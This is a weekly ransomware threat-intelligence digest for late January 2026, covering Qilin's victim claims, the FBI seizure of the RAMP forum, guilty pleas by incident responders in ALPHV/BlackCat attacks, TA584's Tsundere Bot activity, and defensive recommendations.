Executive Summary
Week 5 of 2026 (January 23–30) was dominated by two major law enforcement developments and continued aggressive activity from Qilin ransomware. The FBI seized the RAMP (Russian Anonymous Marketplace) dark web forum on January 28 — the only known forum explicitly allowing ransomware-as-a-service promotion — disrupting a $20 million cybercrime marketplace used by groups including Qilin, LockBit, DragonForce, and RansomHub. Separately, two US cybersecurity professionals — Ryan Goldberg (Sygnia) and Kevin Martin (DigitalMint) — pleaded guilty to conducting ALPHV/BlackCat ransomware attacks while employed as incident responders. Qilin continued its record-breaking surge with 55+ victims already claimed in January 2026, including Tulsa International Airport (US), Philippine Savings Bank (Philippines), Keil Erdbau (Germany), and Moontown (UK). Dark Web Informer tracked 34 ransomware claims from 9 groups on January 28 alone. Initial access broker TA584 expanded operations with the new Tsundere Bot malware alongside XWorm, using blockchain-based C2 infrastructure and targeting organizations across North America, Europe, and Australia.
Key Statistics: - Global: 34 ransomware claims on Jan 28 from 9 groups; 23 claims on Jan 26 from 10 groups; Qilin alone has 55+ victims in January 2026 - Europe: Keil Erdbau (Germany), Moontown (UK), Shaw Hill Primary School (UK), FIAMPACK targeted; UK schools remain frequent victims - Asia: Philippine Savings Bank (Metrobank Group), KSP TLM Indonesia claimed by ransomware groups; Qilin active across APAC - US: Tulsa International Airport (Qilin), Affordable Housing Management (Shinobi), multiple SMBs; ALPHV guilty pleas highlight insider threats; FBI RAMP seizure - Other: CIDEF Argentina (Qilin), FRUIT-BONTÉ Agroalimentaire (Tunisia)
1. EUROPE
1.1 Government
No new European government ransomware incidents reported this week. The Inverclyde Council (Scotland) incident from January 19 was confirmed as a phishing/account compromise rather than ransomware.
1.2 Health, Municipalities & Non-commercial
Shaw Hill Primary School (UK) — Listed among ransomware victims tracked on January 28, 2026. Shaw Hill Primary School in Birmingham was claimed by a ransomware group. Limited details available on the scope of the attack or data compromised. (Dark Web Informer)
Moontown (UK) — Claimed by Qilin ransomware on January 29, 2026. The UK-based organization uses Microsoft 365 infrastructure. No public statement from the victim at time of writing. (Ransomware.live)
1.3 Business
Keil Erdbau (Germany) — German construction/earthworks firm claimed by Qilin ransomware on January 29, 2026. HudsonRock detected infostealer activity with 5 compromised users. Germany remains among Qilin’s top-targeted countries. (Ransomware.live, Red Packet Security)
FIAMPACK (Europe) — Contract packaging company listed among January 28 ransomware victims. (Dark Web Informer)
Morison Insurance Brokers (Ontario, Canada) — Listed among victims tracked on January 28. (Dark Web Informer)
2. ASIA
2.1 Government
No new Asian government ransomware incidents reported this week.
2.2 Health, Municipalities & Non-commercial
No incidents reported this week.
2.3 Business
Philippine Savings Bank (Metrobank Group, Philippines) — Claimed by Qilin ransomware group on January 28, 2026. Philippine Savings Bank is a subsidiary of the Metrobank Group, one of the Philippines’ largest financial conglomerates. No public confirmation or details of data exfiltration from the bank at time of writing. (Ransomware.live, HookPhish)
KSP TLM Indonesia — Listed among ransomware victims tracked around January 28, 2026. Limited details available. (Dark Web Informer)
InfoCom (Qilin) — Claimed by Qilin ransomware on January 28, 2026. (Ransomware.live)
3. UNITED STATES
3.1 Government
Tulsa International Airport (Oklahoma) — Claimed by Qilin ransomware on January 30, 2026. The airport is a major regional hub serving northeastern Oklahoma. The claim was tracked by multiple threat intelligence sources including Ransomware.live and FalconFeeds.io. No public confirmation from airport authorities regarding the scope of the attack or any operational disruption at time of writing. (CyberNews, Ransomware.live)
ALPHV/BlackCat Guilty Pleas — On January 28, two former US cybersecurity professionals pleaded guilty to conspiracy to commit extortion for conducting ALPHV/BlackCat ransomware attacks between April and December 2023. Ryan Goldberg (40, Georgia), an incident response manager at Sygnia, and Kevin Martin (36, Texas), a ransomware negotiator at DigitalMint, abused their positions to extort victims in pharmaceutical, engineering, healthcare, and drone manufacturing sectors. Ransom demands ranged from $300,000 to $10 million, with at least $1.27 million confirmed paid. Sentencing scheduled for March 12, 2026; both face up to 20 years in prison. (SecurityWeek, The Record)
3.2 Health, Municipalities & Non-commercial
Affordable Housing Management, Inc. (AHM) — Nonprofit affordable housing organization established in 1970, claimed by the Shinobi ransomware group on January 27, 2026. AHM develops and manages affordable rental housing. (Ransomware.live, Dark Web Informer)
New Beginnings Church — Listed among January 28 ransomware victims. (Ransomware.live)
JBS Mental Health Authority (Medusa) — Regional US nonprofit providing community mental health services was listed by Medusa ransomware in late December 2025. Medusa claims to have stolen 168.6 GB of data including sensitive client records and internal operational information. Confirmed during this reporting period. (Check Point Research, BreachSense)
3.3 Business
JP Research, Inc. — Listed among January 28 ransomware victims. (Ransomware.live)
Anagnos Door Co. — Listed among January 28 ransomware victims. (Dark Web Informer)
Newkirk Zwagerman, P.L.C. (Iowa) — Employment law firm in Des Moines listed among January 28 ransomware victims. (Dark Web Informer)
David M. Schwarz Architects (Qilin) — Architecture firm claimed by Qilin. Discovery date in the January 23–30 window. (Ransomware.live)
Active Green + Ross (Ontario, Canada) — Tire and auto service chain listed among January 28 ransomware victims. (Ransomware.live)
Gallagher Transport International — Customs broker listed among late January ransomware victims. (Dark Web Informer)
4. REST OF WORLD
4.1 Government
No incidents reported this week.
4.2 Health, Municipalities & Non-commercial
No incidents reported this week.
4.3 Business
FRUIT-BONTÉ Agroalimentaire (Tunisia) — Food industry company listed among ransomware victims tracked around January 28, 2026. (Dark Web Informer)
CIDEF Argentina S.A. (Qilin) — Argentine company claimed by Qilin ransomware. Listed in the January 23–30 window. (Ransomware.live)
5. THREAT ACTOR ACTIVITY
Qilin — Most Active Group
Qilin continued its unprecedented surge, already claiming 55+ victims in January 2026 alone, ahead of its record 2025 pace (1,066 victims, +408% YoY). Notable claims this week include Tulsa International Airport, Philippine Savings Bank, Keil Erdbau, Moontown, InfoCom, and CIDEF Argentina. The group practices double extortion with cross-platform capabilities (Windows, Linux, ESXi) and has absorbed affiliates from collapsed RansomHub and LockBit operations. (Barracuda)
FBI RAMP Forum Seizure
On January 28, the FBI seized the RAMP (Russian Anonymous Marketplace) dark web forum and its clearnet domain ramp4u.io — the only known forum explicitly allowing ransomware-as-a-service promotion. RAMP facilitated an estimated $20 million in cybercrime since its July 2021 launch. Groups including Qilin, LockBit, DragonForce, RansomHub, and ALPHV/BlackCat promoted their operations there. Forum operator “Stallman” confirmed on XSS forum that the takedown “destroyed years of my work” with no plans to rebuild. Leaked database screenshots appeared on Telegram, including alleged LockBit registration details. Arrests are expected within six months. (Bleeping Computer, The Register)
TA584 / Storm-0900 — Initial Access Broker Expansion
Proofpoint published research on January 28 detailing TA584’s expanded operations using Tsundere Bot alongside XWorm RAT. Key developments: TA584 activity tripled in late 2025 vs. Q1; expanded targeting from North America and UK/Ireland to include Germany, European countries, and Australia; Tsundere Bot uses blockchain-based C2 discovery via the Ethereum network; attack chains use ClickFix-style social engineering with PowerShell execution. (Proofpoint, Bleeping Computer)
Shinobi
Claimed Affordable Housing Management (US nonprofit) on January 27. The group continues targeting US organizations across healthcare, housing, and auto sectors.
Medusa
JBS Mental Health Authority listing confirmed, with 168.6 GB data theft claimed. Medusa continues filling the vacuum left by LockBit and BlackCat takedowns.
Amnesia RAT + Ransomware Campaign
A new multi-stage phishing campaign targeting Russian users was observed on January 24, deploying Amnesia RAT and ransomware through business-themed document lures. Reported by Fortinet FortiGuard Labs.
6. KEY TAKEAWAYS
Law enforcement momentum continues. The RAMP forum seizure represents a meaningful disruption to ransomware infrastructure, eliminating the only known dark web forum explicitly hosting RaaS operations. Combined with the ALPHV/BlackCat guilty pleas, this week demonstrated that law enforcement is increasingly targeting both infrastructure and individual operators — including those working within the cybersecurity industry itself.
Qilin’s dominance is accelerating. With 55+ victims in January alone, Qilin is on pace to far exceed its 2025 record of 1,066 victims. The group’s willingness to target critical infrastructure (airports, banks, healthcare) and its absorption of displaced affiliates from dismantled groups make it the most significant ransomware threat entering 2026.
Insider threats are real. The Goldberg/Martin guilty pleas highlight a concerning trend: cybersecurity professionals using their access and knowledge for criminal purposes. Organizations should implement robust access controls and monitoring even for trusted security staff.
Initial access brokers are innovating. TA584’s adoption of blockchain-based C2 (Tsundere Bot) represents an evolution in evasion techniques. The tripling of their activity volume and geographic expansion signals increased supply of compromised network access for ransomware operators.
Small organizations remain vulnerable. This week’s victims include a primary school, a church, a nonprofit housing provider, a small law firm, and various SMBs — confirming that ransomware groups increasingly target organizations with limited security resources.
Defensive Recommendations
- Monitor for indicators associated with Qilin, particularly in manufacturing, financial services, and infrastructure sectors
- Restrict PowerShell execution to reduce TA584/XWorm/Tsundere Bot infection risk
- Review vendor and third-party access controls in light of insider threat cases
- Ensure offline backup procedures are current, particularly for organizations in healthcare and education
- Monitor for RAMP forum fallout — displaced threat actors may migrate to alternative platforms